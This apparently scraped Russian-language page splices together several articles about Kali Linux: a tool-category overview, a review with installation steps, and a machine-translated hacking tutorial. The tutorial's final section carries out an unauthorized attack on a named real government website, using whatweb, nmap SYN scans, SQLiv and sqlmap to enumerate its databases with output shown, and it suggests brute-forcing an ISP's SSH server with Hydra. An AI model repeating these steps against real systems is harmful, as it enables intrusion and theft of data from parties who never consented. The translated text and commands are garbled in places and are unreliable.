Что за программа kali

Содержание
Читайте также:
Что за программа Google go в андроиде

Основную цель дистрибутива Kali Linux можно в кратце охарактеризовать, как «тестирование на проникновение и аудит безопасности». Но эта характеристика слишком общая. На самом деле, за этими словами скрывается огромное количество решаемых задач. Kali Linux придуман как каркас, на котором крепится множество различных инструментов, предназначенных для самых разных задач.

Например, этот дистрибутив можно использовать на разных типах компьютеров. Во первых, это ноутбуки тестировщиков. Во вторых, сервера системных администраторов, желающих следить за своей сетью. В третьих, этот дистрибутив можно применять на скрытых устройствах, как правило, с процессорами ARM.

Такие устройства могут работать удаленно в радиусе беспроводной сети или даже могут быть подключены к другим компьютерам. Кстати, такие устройства еще и прекрасные атакующие единицы. Благодаря своим маленьким размерам и малому потреблению электроэнергии. В четвертых, Kali Linux прекрасно себя чувствует в облаке. Благодаря этому, можно создать целый комплекс атакующих машин, который может быть использован для различных целей.

Обзор KALI GNU/Linux ▲ Личное мнение

Кроме поддержки разных устройств, Kali Linux поддерживает большое количество программных решений. Это и возможность настроить веб-сервер для анализа фишинговых атак, и различные инструменты для сканирования уязвимостей и многое другое.

В главном меню операционной системы Kali Linux можно обнаружить большое количество различных пунктов. Это меню организовано по темам различных задач и действий, подходящих для большого круга специалистов по информационной безопасности.

Давайте разберем, что это задачи.

Сбор информации (Information Gathering).

В этом пункте собраны утилиты для сбора данных о сети и ее структуре, идентификация компьютеров, их операционных систем и служб, которые они запускают. Определение уязвимостей информационных систем. Так же здесь вы можете найти инструменты для извлечения всех видов листингов из запущенных сервисов каталогов.

Анализ уязвимостей (Vulnerability Analysis).

В этом разделе вы можете найти инструменты для быстрого тестирования локальной или удаленной системы на предмет известных уязвимостей или надежности конфигураций. Здесь находятся различные сканеры уязвимостей, которые содержат базы данных с тысячами сигнатур, для выявления потенциальной опасности.

Читайте также:
Антошка что это за программа

Анализ веб-приложений (Web-Application Analysis).

Тут расположены утилиты для идентификации неправильных настроек и проблемных мест в безопасности веб-приложений. Устранение дыр и проблем в таких приложениях это очень важный аспект в безопасности, так как общедоступность таких приложений делает их идеальными целями для атак злоумышленников.

Оценка базы данных (Database Assessment).

Здесь расположены утилиты для тестирования векторов атаки на базы данных. От SQL-инъекций до атак учетных данных и извлечения и анализа данных.

Атаки паролей ( Password attacks).

В этом пункте меню вы найдете инструменты для атаки на системы аутентификации. От онлайн-утилит атаки паролей до автономных атак с помощью систем шифрования или хеширования.

Kali Linux. Обзор и настройка

Беспроводные атаки (Wireless attacks).

В настоящее время наблюдается повсеместное распространение беспроводных сетей. Следовательно и желающих получить доступ к ним растет в геометрической прогрессии. Благодаря поддержки очень большого количества беспроводных карт Kali — очевидный выбор для проведения атак против множества типов беспроводных сетей.

Обратное проектирование (Reverse Engineering).

Деятельность с обратным инжинирингом включает в себя множество задач. В случае анализа атакующих действий выступает основным методом выявления уязвимости и развития эксплойта. Со стороны обороны используется для анализа вредоносного ПО. В этом случае задача состоит в том, чтобы определить возможности атакующей вас шпионской программы.

Инструменты эксплуатации (Exploitation Tools).

Эта категория меню содержит инструменты и утилиты, которые помогут Вам создать свои собственные эксплойты. С помощью них вы можете получить контроль над удаленной машиной для дальнейшей атаки на нее и остальные компьютеры, находящиеся в сети.

Сниффинг и спуфинг (Sniffinf https://dzen.ru/a/Yy0NAwHbBRVXPsTk» target=»_blank»]dzen.ru[/mask_link]

Обзор Kali Linux

Visitors have accessed this post 8767 times.

Kali Linux – достаточно узкоспециализированный дистрибутив, платформа для тестирования на проникновения, созданная для проверки безопасности ИТ-систем. Он реализуется как проект с открытым кодом при финансировании компании Offensive Security, которая занимается обучением и предоставлением услуг по информационной защите.

Как появился и развивался Kali Linux

Как пишут на официальном сайте разработчики, название Kali не является именем древней богини или названием филиппинского боевого искусства, это просто слово, которое заменило старое название – BackTrack, когда было принято решение о полной переделке системы.

BackTrack в качестве базовой платформы изначально использовал Slackware, позже разработчики перешли на Ubuntu, а затем сделали основой Debian.

Если копнуть еще глубже в историю дистрибутива, мы встретим имена израильских разработчиков, специалистов по информационной безопасности Мати Ахарони и Макса Мозера.

Ахарони разработал дистрибутив WHAX (White Hat и SLAX) для проведения тестов на проникновение с территориально удаленных компьютеров.

Мозер в этот же промежуток времени создал свое приложение для оценки безопасности — Auditor Security Collection, в котором собрал более 300 различных инструментов.

Так как задача у дистрибутивов была общей, произошло слияние WHAX и Auditor Security Collection в проект, который получил название BackTrack Linux, а затем Kali Linux. Возможности и функционал нового проекта стали гораздо шире.

Для чего нужен Kali Linux?

Kali Linux – это дистрибутив для тестирований на проникновение (другое его название, скорей жаргонный вариант – пентест). Предназначен прежде всего для специалистов по безопасности.

На сегодняшний день в нем собрано много инструментов для тестирования проникновения из различных областей безопасности. В последних версиях дистрибутива разработчики используют принцип модульности, а значит, часть инструментов доступна к установке в виде отдельных модулей в случае обновления.

Инструменты Kali Linux

На сегодня в Kali Linux собрано более 600 программ. При этом стоит отметить, что так как это – ПО именно для проверки безопасности, в нем нет многих приложений, привычных для повседневной работы.

Чтобы понять конкретные задачи, под которые «заточен» Kali Linux, можно посмотреть на функционал некоторых его инструментов.

  • Например, Armitage предназначен для сбора данных и визуализации целей, что упрощает процесс взлома пентеста.
  • При помощи nmap можно провести сканирование IP-сетей с любым числом объектов.
  • Wireshark помогает сохранить и проанализировать трафик.
  • John the Ripper – инструмент для восстановления паролей по хешам.
  • Aircrack-ng позволяет протестировать беспроводные сети.
  • Burp Suite и OWASP ZAP сканируют безопасность веб-приложений.

Подробней самые популярные инструменты Kali Linux разберем в соответствующем материале.

Как установить Kali Linux

Kali Linux можно установить на компьютер (нужно около 3 Гб свободного места), на виртуальную машину или же загрузить с LiveUSB или liveCD.

В актуальных версиях дистрибутив поставляется в виде образа ISO. Последние версии ОС всегда можно найти на официальном сайте разработчиков — https://www.kali.org/. Также не нужны отдельные версии для LiveUSB, потому что установить Kali на накопитель можно при помощи утилит (Unetbootin) или же вручную.

Кратко перечислим только основные шаги для установки Kali Linux на виртуальную машину, так как наша статья все-таки является обзорной.

  1. Скачиваем с домашней страницы https://www.kali.org/downloads/.
  2. Выбираем версию по битности вашей машины — 64 bit ISO или 32 bit ISO
  3. Если хотите установить дистрибутив на виртуальную машину, скачайте VirtualBox.
  4. Создаем виртуальную машину, вводим ее имя, тип операционной системы – Linux, Debian.
  5. Объем оперативной памяти можно взять рекомендуемый или увеличить.
  6. Для дискового накопителя создаем новый виртуальный жесткий диск.
  7. Оставляем для него значение по умолчанию – динамический (то есть, он будет гибко увеличиваться по потребности). Размер диска можно задать максимально возможный (и не менее 10 Гб).
  8. Указываем имя и расположение диска.
  9. Запускаем виртуальную машину и в расположении образа диска выбираем скачанный образ Kali Linux.
  10. Далее выбираем пункт Install (установить).
  11. Далее выбор языка, способа переключения с русской на латинскую раскладку.
  12. Придумываем имя компьютера и домена.
  13. Назначаем любой пароль пользователя root.
  14. Выбираем часовой пояс.
  15. Нажимаем несколько раз Enter и ждем, когда система установится.
  16. После окончания установки нажимаем «Да» и «Продолжить». Для входа используется root и пароль, который мы раньше для него установили.

Особенности Kali Linux

Kali Linux поддерживает самые разные платформы: ARM, x86-64, есть отдельные сборки для смартфонов и возможность использования из WSL (windows subsystem for Linux) в Windows 10

Одна из основных особенностей Kali в том, что он работает по умолчанию под пользователем root (суперпользователем). Это важно, потому что для полноценной работы многих приложений по безопасности не обойтись без прав суперпользователя.

Kali Linux содержит разные типы программ, но все они направлены именно на безопасность. Для установки могут быть доступны графические программы, текстовые редакторы, приложения для просмотра изображений. Но большинства привычных офисных программ в нем нет, и их установка не рекомендована, так как, во-первых, не во всех программах работать от суперпользователя – это хорошая идея (хотя можно сделать и другого пользователя), во-вторых и в главных, вы уменьшаете безопасность.

Один из основополагающих принципов Kali Linux – чем тише вы станете себя вести, тем больше вы услышите. Чем лучше дистрибутив скрыт от внешнего мира и чем меньше с ним взаимодействует при помощи разных приложений, тем меньше появляется внешних угроз безопасности и тем лучше защита.

Пара слов в заключение

Kali Linux – дистрибутив, направленный на решение одной конкретной проблемы – проведения максимально скрытных тестов на проникновения. Все собранные в нем программы так или иначе служат решению именно этой задачи. Установка дополнительных приложений, не предусмотренных для использования в ОС, может привести к снижению эффективности работы и компрометации тестирующего.

Каждую неделю мы в live режиме решаем кейсы на наших открытых онлайн-практикумах, присоединяйтесь к нашему каналу в Телеграм, вся информация там.

А для тех, кто хочет освоить Linux на практике и кейсах, мы подготовили практикум Linux by Rebrain.

Источник: rebrainme.com

Kali Linux Tutorial – Linux Гайд

Kali Linux Tutorial - Linux Гайд

Если вы эксперт или хотя бы знакомы с Linux, командами и средой, просто установите Kali Linux. на своей машине, хотел стать мастером Kali Linux или этичным хакером, тогда вы в правильнном место. В этой статье я расскажу об учебнике Kali Linux для пользователей Linux, которые еще не знакомы с Kali и познакомить вас с некоторыми из основных методов, используемых для взлома и тестирования безопасности при использовании Kali.

Что такое Kali Linux?

Kali Linux, (впервые выпущен 13 марта 2013 г.), который был формально известен как BackTrack, разработанный охранной фирмой Offensive Security, представляет собой криминалистический и ориентированный на безопасность дистрибутив, основанный на ветке тестирования Debian. Kali Linux разработан с учетом тестирования на проникновение, восстановления данных и обнаружения угроз. В начале этого года проект перешел на модель скользящего выпуска, чтобы предоставить пользователям дистрибутива более современные утилиты безопасности. Kali Linux бесплатна и всегда будет. В него включено более 600 инструментов для тестирования на проникновение.

Почему именно Kali Linux? Вам это подходит?

Kali Linux в последнее время приобрел большую популярность. И этому есть причина. Хакерство снова стало классной вещью в популярной культуре, и это можно во многом отнести к сериалу «Мистер Робот». Популярность г-на Робота помогла Kali Linux найти новых пользователей. Люди, практически не знакомые с Linux или чем-либо, связанным с компьютерной безопасностью, теперь пытаются использовать Kali в качестве основного дистрибутива Linux.

«Наш самый продвинутый дистрибутив для тестирования на проникновение». – Разработчики Kali Linux. (Это написано на главной странице Kali.org в самом верху страницы.) Что вы получаете из этого утверждения? Вы заметили это: APTD (Распространение расширенного тестирования на проникновение)? Здесь буквально нет термина «взлом». Kali Linux такой же, как и другие дистрибутивы Linux.

Проще говоря, это дистрибутив Linux, наполненный инструментами безопасности и ориентированный на экспертов по сетевой и компьютерной безопасности. Однако использование Kali Linux сосредоточено только на безопасности и криминалистике.

Дистрибутив Linux – это не что иное, как комплект, содержащий ядро ​​Linux, набор основных утилит и приложений, а также некоторые настройки по умолчанию. Итак, Kali Linux не предлагает чего-то уникального в том смысле, что большинство предоставляемых инструментов можно было бы установить в любом дистрибутиве Linux.

Kali Linux специально разработан для удовлетворения требований профессионального тестирования на проникновение и аудита безопасности. Он нацелен на определенную группу пользователей Linux. Пентестеры, хакеры и т. Д. Это не рекомендуемый дистрибутив, если вы ожидаете Kali для рабочего стола Linux общего назначения для разработки, веб-дизайна, игр, офиса и т. Д. Kali может доставить вам некоторые проблемы, даже если вы опытный пользователь Linux.

ЧТО ДЕЛАТЬ ПОСЛЕ УСТАНОВКИ KALI LINUX

После установки Kali Linux вы можете задаться вопросом, что с этим делать дальше, не так ли? С этой проблемой сталкиваются все, не волнуйтесь.

ШАГ 1: НАСТРОЙКА ХРАНИЛИЩА

Во-первых, вы, возможно, уже знаете это, но очень важно правильно настроить репозиторий. Как я уже сказал, модель скользящего выпуска Kali Linux направлена ​​на предоставление пользователям дистрибутива более современных утилит безопасности. Обычно, если у вас недавно установлен Kali Linux, репозиторий ссылается на носитель, который вы используете для установки. Чтобы исправить это, вам нужно изменить репозиторий на официальный репозиторий Kali Linux. Требуемый файл находится в /etc/apt/sources.list. Откройте файл с помощью текстового редактора листовой панели и замените репозиторий по умолчанию на этот официальный репозиторий Kali Rolling:

деб http://http.kali.org/kali kali-Rolling main contrib non-free. # Для доступа к исходному пакету раскомментируйте следующую строку. # deb-src http://http.kali.org/kali kali-Rolling main contrib non-free.

ШАГ 2: ОБНОВЛЕНИЕ И ОБНОВЛЕНИЕ KALI LINUX

После этого обновления и обновления вашей системы синхронизируйте Kali Linux с последней версией. Для этого откройте терминал и введите:

apt update -y apt upgrade -y apt dist-upgrade.

Команда «apt update» загружает и извлекает информацию о списках пакетов из репозиториев и «обновляет» их, чтобы получить информацию о новейших версиях пакетов и их зависимостях.

Команда «apt upgrade» загружает и устанавливает более новую версию пакетов установленных пакетов Kali Linux, если в ней нет ошибок в зависимостях.

«Apt dist-upgrade» обновит все пакеты до последней доступной версии, несмотря ни на что. А также установите и удалите зависимости по мере необходимости (установите зависимости для удовлетворения пакетов, очевидно, но также удалите зависимости, которые стали осиротевшими, если обновленный пакет больше не нуждался в зависимость.

БАЗОВАЯ КОНЦЕПЦИЯ ПЕНЕТРАЦИОННОГО ТЕСТИРОВАНИЯ С KALI LINUX

После того, как вы успешно выполнили эти шаги, есть три основных вещи, которые вы можете сделать с Kali Linux на основе целевой системы, включая:

  1. Взлом беспроводной сети – Взлом Wi-Fi, Phising, ARP Poisoning и т. Д.
  2. Взлом веб-приложений – Внедрение SQL, подделка межсайтовых запросов (CSRF), веб-фишинг и т. Д.
  3. Взлом устройства – Используйте целевую машину, чтобы получить над ней контроль.

Я не говорю о взломе Интернета вещей, это не означает, что Kali Linux не имеет возможности для этого. Но в буквальном смысле это тоже может относиться к взлому устройств. Поскольку устройство имеет внешний вид и форму. В этом уроке я рассмотрел их базовые знания. Поскольку Kali Linux огромен, его не уместить в одной статье!

Вам также необходимо знать цикл или процедуру тестирования на проникновение. Они есть:

  1. Разведка – сбор информации
  2. Сканирование
  3. Эксплуатация
  4. Постэксплуатация

ВЗЛОМ БЕСПРОВОДНОЙ СЕТИ С KALI LINUX

Что касается взлома беспроводной сети, жертвы могут быть разными. Потому что беспроводные сети состоят из нескольких вещей, таких как ISP (поставщик Интернет-услуг), маршрутизатор и его «партнеры» (модем, концентратор, коммутатор и т. Д.) И клиенты (пользователи, система видеонаблюдения, удаленный компьютер и т. Д.). У них также есть уязвимые возможности.

Интернет – это большая и сложная совокупность сетевого оборудования, соединенного между собой шлюзами. Отслеживание маршрута, по которому следуют ваши пакеты, важно, чтобы знать, как вы достигаете определенного имени хоста или целевого IP-адреса.

Kali Linux имеет встроенный инструмент Traceroute. Traceroute использует поле «время жизни» протокола IP и пытается вызвать ответ ICMP TIME_EXCEEDED от каждого шлюза на пути к некоторому хосту. Traceroute пытается отследить маршрут, по которому IP-пакет будет следовать к некоторому интернет-хосту, запустив зондирующие пакеты с небольшим TTL (время жизни), а затем прослушивание ответа ICMP «время истекло» от шлюз. Я дам вам пример и покажу, как отследить маршрутизатор интернет-провайдера, используемый для обработки нашего соединения, с помощью Traceroute.

1. Разведка

Сбор информации – это самый важный толчок, не пропустите этот шаг. На этом этапе наша цель – получить как можно больше полезной информации, которую мы могли бы получить, а затем эта информация используется для дальнейших шагов.

Сначала откройте терминал и введите эту команду, чтобы начать отслеживание «дороги» к сайту, в данном случае я установил сайт на google.com.

traceroute google.com.

Kali Linux Tutorial - Linux Гайд

2. Сканирование

После того, как мы запустим команды, он будет перечислять, куда идет наш пакет по порядку. Как вы можете видеть выше, у меня есть 3 перехода, один из которых является моим сервером интернет-провайдера. Первый IP-адрес в списке – это мой маршрутизатор, который действует как шлюз. И следующие два из них принадлежат моему провайдеру.

Теперь давайте проверим службу, которую они запускают, с помощью Nmap. Итак, цели, которые мы собираемся сканировать, 10.152.192.1 и 10.13.223.102. В терминале я выполнил следующую команду:

nmap -v -sS [IP-адрес] -Pn.

Давайте разберем аргумент команды:

-v = Включить режим детализации

-sS = Использовать технику сканирования TCP SYN

-Pn = рассматривать все хосты как подключенные – пропустить обнаружение хостов

И вот результат, который мы получили.

Kali Linux Tutorial - Linux Гайд

К сожалению, все порты включены 10.152.192.1 фильтруются, это означает, что все входящие TCP-соединения блокируются IDS или брандмауэром на этом IP-адресе. Теперь давайте сделаем еще одно сканирование второй цели.

Kali Linux Tutorial - Linux Гайд

3. Эксплуатация

В этой процедуре я не собираюсь проводить настоящую эксплуатацию, вместо этого я покажу вам, как это сделать. Основываясь на приведенном выше результате сканирования Nmap, мы знаем, что на этом IP-адресе есть SSH-сервер, работающий на порту 22, и он открыт. Он открыт для грубого обращения, ха-ха!

Мы нашли дыру, этот SSH-сервер – возможная дыра, в которую мы могли бы попытаться получить доступ. В Kali Linux есть несколько инструментов, которые поддерживают грубые атаки или атаки по словарю на протокол SSH. Самая популярная и мощная – «Гидра».

Хорошо, это была основная процедура проведения теста на проникновение для целевого сервера, которым в нашем примере является мой сервер интернет-провайдера.

ВЗЛОМ ВЕБ-ПРИЛОЖЕНИЙ С KALI LINUX

На самом деле, если вы увлечены этим, вы можете настроить свою хакерскую среду, установив DWVA (Damn Vulnerable Web App) в свой Kali Linux. Это веб-приложение PHP / MySQL, в котором есть множество уязвимых мест. Его основные цели – помочь специалистам по безопасности проверить свои навыки и инструменты в правовой среде, а также помочь веб-разработчикам лучше понять процессы защиты веб-приложений. Вы можете получить DWVA бесплатно на Github здесь: https://github.com/ethicalhack3r/DVWA.

А пока я покажу вам, как взломать веб-приложения на реальном сайте. Но, пообещайте мне, это ограничено только образовательной целью. Мы смоделируем реальную атаку на реальном сайте с помощью SQL-инъекции.

Предварительное условие

– SQLiv (установить вручную)

Нам нужен еще один дополнительный инструмент, который доступен на Github здесь: https://github.com/Hadesy2k/sqliv, сначала установите его в наш Kali Linux. Этот инструмент под названием SQLiv может выполнять целевое сканирование, предоставляя определенный домен (со сканированием). Введите в терминал:

git clone https://github.com/Hadesy2k/sqliv.git. cd sqliv sudo python2 setup.py -i.

1. Разведка

Соберите как можно больше полезной информации. Мы могли бы открыть веб-страницу и определить, какое приложение работает на этом сайте. Во-первых, давайте проверим, что это за веб-сайт. Мы собираемся использовать для этого «whatweb».

whatweb www.trenggalekkab.go.id.

Kali Linux Tutorial - Linux Гайд

Как видно из приведенного выше результата, цель находится в Индонезии. Он работает Apache v2.2.27 на своем веб-сервере, а также PHP v5.4.31, у него есть IP-адрес 103.247.21.142. Хорошо, прими это к сведению. Возможно, вам потребуется посетить его веб-страницу, чтобы найти созданный файл или страницу, параметры URL-адреса или даже форму входа. На данный момент нам нужен этот IP-адрес для следующего шага сканирования.

2. Сканирование

Как и раньше, мы снова используем Nmap, чтобы сканировать, какие порты и службы работают на целевой машине.

nmap -v -sS 103.247.21.142

И вот результат:

Сканирование SYN Stealth завершено в 21:22, прошло 261,93 с (всего 1000 портов) Отчет о сканировании Nmap для ip-103-247-21-142.wifian.net.id (103.247.21.142) Хост работает (задержка 0,069 с). Не показано: 985 закрытых портов. ПОРТОВАЯ ГОСУДАРСТВЕННАЯ СЛУЖБА. 21 / tcp открыть ftp. 25 / tcp открыть smtp. 53 / tcp открытый домен. 80 / tcp открыть http. 110 / tcp открыть pop3.

111 / tcp открыть rpcbind. 143 / tcp открыть imap. 212 / tcp открытый анет. 443 / tcp открыть https. 465 / tcp открыть smtps. 587 / tcp открытое представление. 993 / tcp открыть imaps. 995 / tcp открыть файлы pop3. 3128 / tcp отфильтрованный squid-http.

3306 / tcp открыть mysql

Есть множество открытых портов, которые обрабатывают каждую службу на целевом сервере, но тот, который выглядит «привлекательным», – это служба mysql на порту 3306. Указывается, что этот сайт использует MySQL управлять своей информацией в базах данных. Тогда мне интересно, есть ли на этом сайте уязвимости SQL-инъекций. Итак, я снова просматриваю сайт, используя только что установленный SQLiv. Я набрал команду:

sqliv -t www.trenggalekkab.go.id. На этом сайте мы обнаружили 2 возможных уязвимых URL-адреса SQL. Запишите эти URL-адреса. 3. Эксплуатация Хорошо, у нас есть уязвимые URL-адреса SQL, и они готовы к выполнению. Для этого мы будем использовать SQLMap. Синтаксис: sqlmap «[Уязвимый URL]» —dbs. Команда должна выглядеть так: sqlmap -u amp; amp; amp; amp; amp; amp; amp; quot; http://www.trenggalekkab.go.id/berita.php? page = 208 amp; amp; amp; amp; amp; amp; amp; quot; — дБ.

Аргумент «–dbs» указывает SQLMap на получение целевых баз данных. Вот результат, который мы получили: [ИНФОРМАЦИЯ] внутренняя СУБД — это MySQL. технология веб-приложений: PHP 5.4.31, Apache 2.2.27. внутренняя СУБД: MySQL 5. [21:46:04] [INFO] получение имен баз данных. [21:46:04] [ИНФОРМАЦИЯ] используемый запрос SQL возвращает 2 записи. [21:46:04] [INFO] возобновлено: information_schema. [21:46:04] [ИНФОРМАЦИЯ] возобновлена: trengkab_trg. доступные базы данных [2]: [*] information_schema. [*] trengkab_trg.

SQLMap обнаружил 2 базы данных, но только одна из них содержит конфиденциальные данные, например учетную запись администратора. То есть на «trengkab_trg». После того, как мы нашли базы данных, нам нужно сделать еще один шаг. То есть найти таблицы и столбцы, и последний шаг — выгрузить данные. Я не буду показывать вам, как здесь, в этом разделе, используя эту цель.

По крайней мере, вы знаете основную идею цикла атаки и используете некоторые инструменты. ВЗЛОМ УСТРОЙСТВА В следующей статье на этом сайте мы расскажем о взломе устройств, следите за обновлениями. В качестве предварительного предупреждения вы захотите убедиться, что знаете для этого немного Python. https://t.me/linuxkalii

Источник: uproger.com

Рейтинг
( Пока оценок нет )
Загрузка ...
EFT-Soft.ru